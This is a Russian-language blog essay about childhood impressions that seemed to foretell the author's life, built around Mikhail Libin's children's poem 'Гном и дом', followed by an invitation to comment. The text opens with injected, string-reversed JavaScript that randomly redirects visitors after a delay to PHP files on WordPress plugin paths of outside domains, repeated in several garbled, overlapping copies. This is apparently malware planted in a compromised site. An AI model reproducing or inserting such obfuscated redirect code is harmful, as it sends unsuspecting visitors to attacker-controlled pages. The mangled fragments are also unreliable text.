$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>
Продолжая эту серию о нашем детстве хотел бы порассуждать с вами о тех почти пророческих «узнаваниях», через которые мы проходим. Возможно, я ошибаюсь, и то, что принимаю за «узнавания» на самом деле является сильными впечатлениями, которые в том или другом сформировали характер, а затем и судьбу. Но остается вопрос: а почему именно то-то и то-то произвело неизгладимое впечатление на меня, а то-то и то-то — на вас? Почему тот-то и тот-то эпизод, герой, впечатление, встреча, поездка — произвели впечатление на меня, а тот-то и тот-то — на вас? Не вполне я уверен, как все это работает, но теперь, оглядываясь назад, я четко вижу, что все то, что по каким-либо причинам до дрожи пробирало меня в детстве — все это потом происходило в моей жизни. Бытие ли определяет сознание, или сознание определяет бытие — я здесь спорить не берусь, а вместо этого поделюсь своими детскими опытами, своими переживаниями. А вы, возможно, вспомните свои. Возможно даже, это поможет вам лучше понять — кто вы?
Я уже писал о самых ранних воспоминаниях детства, и о жажде вечности, которая приобретает местечковые, причудливые формы в жизни каждого ребенка. Но вот теперь задумаемся о первых наших столкновениях с какими-то существующими вне нас судьбами, характерами, событиями, наборами идей — которые мы получали из наших контактов с родными и близкими людьми, первыми друзьями, а также из книг, радио и телевидения. Почему некоторые вещи, некоторые эпизоды. некоторые герои — проходят мимо, почти не задев нас. Другие же наоборот вызывают землетрясение маленькой детской жизни.
Почему? Я помню самое первое «пророчество», горьковатое, которое я прочувствовал, которое коснулось меня. Вечерами мама читала мне разные детские книжки, или сама выдумывала сказки. Слушать их было хорошо, засыпать под них было здорово. Все было приятно, интересно. Но что-то задевало особенным образом — и лишало сна. Из десятков и сотен книжек, историй, фильмов, встреч — какие-то пронзали нас странным щемящим чувством — ты как будто узнавал свою будущую жизнь. Конечно, ты не понимал этого, как не понимал ты и того — почему тебя вдруг так задело что-то?
Помню, кажется, что самое первое внешнее впечатление, внешняя, не моя история, которая задела меня — было стихотворение, которое мама прочитала мне (и потом, по моей просьбе, много раз еще читала мне) в той самой каморке, в которой я однажды построил свой «вечный танк«. Это было стихотворение, которое так резонировало с моим мозгом, что тот начинал ходить какими-то кругами, какими-то глубокими волнами сознания, которые прокатывались через тебя — так, что будто в голове гудело от них. Итак, моим первым предвкушением будущего — притом не слишком радужного — стало стихотворение Михаила Либина, которое, возможно, знакомо и вам — Гном и дом:
Далеко в краю лесном жил-был старый-старый Гном. Был у Гнома старый Дом — Триста лет прожил он в нем. И бывало, если Гнома не бывало долго дома, Старый Дом о нем скучал, Грустно ставнями стучал. Раз понадобилось Гному на три дня уйти из дома неизвестно почему. но на третий вечер Дому стало скучно одному. Старый Дом навстречу Гному зашагал в ночную тьму. Гном вернулся: Дома нет, и росой усеян след. Все места вокруг знакомы, только Дома нету дома. Что могло случиться с Домом? Может, он ушел к знакомым? Может, он с дороги сбился? С непривычки заблудился? Встретил речку на пути — и не может перейти? И подумал старый Гном: «Бедный, бедный старый Дом! Поспешу ему навстречу — хоть на полдороге встречу!» Очень мало интереса До утра шагать по лесу. ночь прошла, и день настал. Дом бояться перестал. подустал, замедлил шаг, и решил при этом так: «Гном, небось, давно уж дома — знать, домой пора и Дому!» Воротился — Гнома нет, и в лесу затерян след. Дом вернулся — Гнома нет. Гном вернулся — Дома нет. Гнома нет и Дома нет, и порос травою след. Через год — с большим трудом — повстречались Дом и Гном. -Дом, родной! -Гном, родной! Как я счастлив, ты со мной! Сказка кончено. Осталось лишь один совет вам дать: если мама потерялась, значит, маму надо ждать! слишком долго маму ждать не придется: мама будет вас искать — и сама найдется!

Простой такой стишок. Но он как будто приоткрыл мне мое будущее — мои долгие-долгие скитания вдали от дома, вдали от родины — и мое возвращение. Я же тогда не знал еще, что во многом уподоблюсь маленьким хоббитам, которые отправятся за тридевять земель и найдут на свою голову куда более приключений, чем думали. Год для маленького человечка — а именно столько были в разлуке гном и дом — это бесконечно долгий период. В моем случае он растянулся на десятки лет…Я и сегодня, читая эти строки, как будто ощущаю аромат молока (из кафетерия в доме напротив) из бутылки с широким горлышком, запах шерстяного одеяла и свою желтую детскую ночную рубашку… И щемящее сердце чувство, что мне когда-то придется пройти непростым путем гнома.
А потом были какие-то отрывки из фильмов, из книг — вроде бы ничем не примечательные, на что другие не западали — а мне они душу сверлили. Какие-то мелочи, запахи, слова, которые проносились мимо глаз других — по непонятным причинам застревали в моем сознании, и потом прокручивались там ночами, годами… А какие-то «большие» вещи, эпизоды, сцены — в одно ухо влетали, из другого вылетали.
А кого-то они задевали. А кто-то не спал по ночам — возможно оттого, что нечаянно заглянул в свое будущее. Вот так и притягиваются к нам те вещи, которые по-настоящему значимы — только для нас, или особенно для нас. Мы начинаем обрастать ими, одеваться в них. И вовсе необязательно потому, что они нам нравятся. Я помню некоторые вещи, которые мне не нравились — но которые странным образом будоражили меня. Но я не буду утомлять вас этим — я выполнил свое обещание и поделился первым из таких впечатлений. Которое, увы, оказалось пророческим. А может, это было лишь странно сильное впечатление, отразившееся на психике и на судьбе? Как вы думаете? Помогите мне разобраться. Какие были ваши первые сильные впечатления от столкновения с книгами? Фильмами? Ситуациями? Людьми? Поделитесь.
Поделитесь своими мыслями ниже, в комментариях.
Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.
Мы в соцсетях
Солёное радио — Telegram, YouTube, ВКонтакте, Яндекс Дзен
«Новости христианства» — Telegtam, ВКонтакте
No Comments